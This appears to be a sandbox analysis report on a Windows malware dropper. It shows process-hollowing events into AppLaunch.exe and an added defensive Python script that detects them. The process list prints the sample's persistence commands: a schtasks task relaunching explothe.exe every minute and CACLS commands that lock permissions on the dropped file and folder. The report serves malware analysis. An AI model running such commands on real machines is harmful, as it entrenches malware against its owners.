Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9675.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1960 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
PID 1960 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
PID 1960 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 1500 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
PID 3232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
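The rows above are raw write events and take some squinting: every ordinary child launch in this run shows up as three writes from parent to child, while the eight-to-ten write bursts from 1Qu36gg4.exe, 2Xo6051.exe and 4fF062EF.exe into freshly started AppLaunch.exe instances are the shape process hollowing leaves in this kind of log. The Python below is an added example, not part of the sandbox output: it parses rows in exactly this format, collapses them into writer-to-target edges with counts, rebuilds each PID's ancestry, counts how many IXP<nnn>.TMP extraction stages precede it, and flags writes into Microsoft .NET host binaries. The host list and the "first writer is the parent" rule are the editor's assumptions, and the embedded rows are a constructed excerpt of the table above with reduced per-edge counts.

```python
import re
from collections import Counter

# Constructed excerpt of the "Suspicious use of WriteProcessMemory" rows in
# this report; per-edge row counts are reduced, the full table is on the page.
SAMPLE_ROWS = r"""
PID 964 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
PID 3232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
PID 4452 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
PID 4840 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
PID 1960 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
PID 5024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2636 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5024 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
PID 488 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4840 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
PID 1500 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4452 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
PID 1720 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"""

# Row layout: "PID <writer> wrote to memory of <target> N/A <writer image> <target image>".
# The first image is matched non-greedily up to its ".exe" so a path with spaces
# in the target still parses.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+\.exe)$", re.I)

# Microsoft-signed .NET utilities that commodity loaders hollow out. Editor's
# assumption from common tradecraft; the report does not supply this list.
HOLLOW_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
                "installutil.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe"}


def parse_rows(text):
    """Collapse rows into (writer, target) -> count plus image and parent maps."""
    edges, image, parent = Counter(), {}, {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:                       # header or stray line
            continue
        src, dst, src_img, dst_img = m.groups()
        src, dst = int(src), int(dst)
        edges[(src, dst)] += 1
        image.setdefault(src, src_img)
        image.setdefault(dst, dst_img)
        parent.setdefault(dst, src)     # assumption: first writer is the parent
    return edges, image, parent


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid, parent):
    """Root-first chain of PIDs leading to pid."""
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return chain[::-1]


def stage_depth(pid, image, parent):
    """Number of IXP<nnn>.TMP (nested IExpress-style SFX) stages above pid."""
    return sum(1 for p in ancestry(pid, parent)
               if re.search(r"\\IXP\d{3}\.TMP\\", image[p], re.I))


def hollowing_candidates(edges, image):
    """Writes into a .NET host by a non-host image. The write count is kept so
    the analyst can separate a burst (hollowing) from plain child setup."""
    hits = []
    for (src, dst), n in edges.items():
        if basename(image[dst]) in HOLLOW_HOSTS and basename(image[src]) not in HOLLOW_HOSTS:
            hits.append({"writer": src, "target": dst, "writes": n,
                         "writer_image": image[src], "target_image": image[dst]})
    return sorted(hits, key=lambda h: h["target"])


if __name__ == "__main__":
    edges, image, parent = parse_rows(SAMPLE_ROWS)
    for h in hollowing_candidates(edges, image):
        chain = " -> ".join(f"{p}:{basename(image[p])}" for p in ancestry(h["target"], parent))
        depth = stage_depth(h["target"], image, parent)
        print(f"{h['writes']:2d} writes into PID {h['target']} after {depth} SFX stages: {chain}")
```

On the full table the same code reports 8, 10, 3 and 8 writes into PIDs 4172, 1092, 3872 and 516 respectively, six extraction stages above the deepest AppLaunch.exe, and explothe.exe (the Amadey persistence copy) as a plain child rather than a hollowing target.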

Uses Task Scheduler COM API

persistence

Processes (each entry lists the image path, then the command line it was started with)

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe

"C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1092 -ip 1092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 204

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

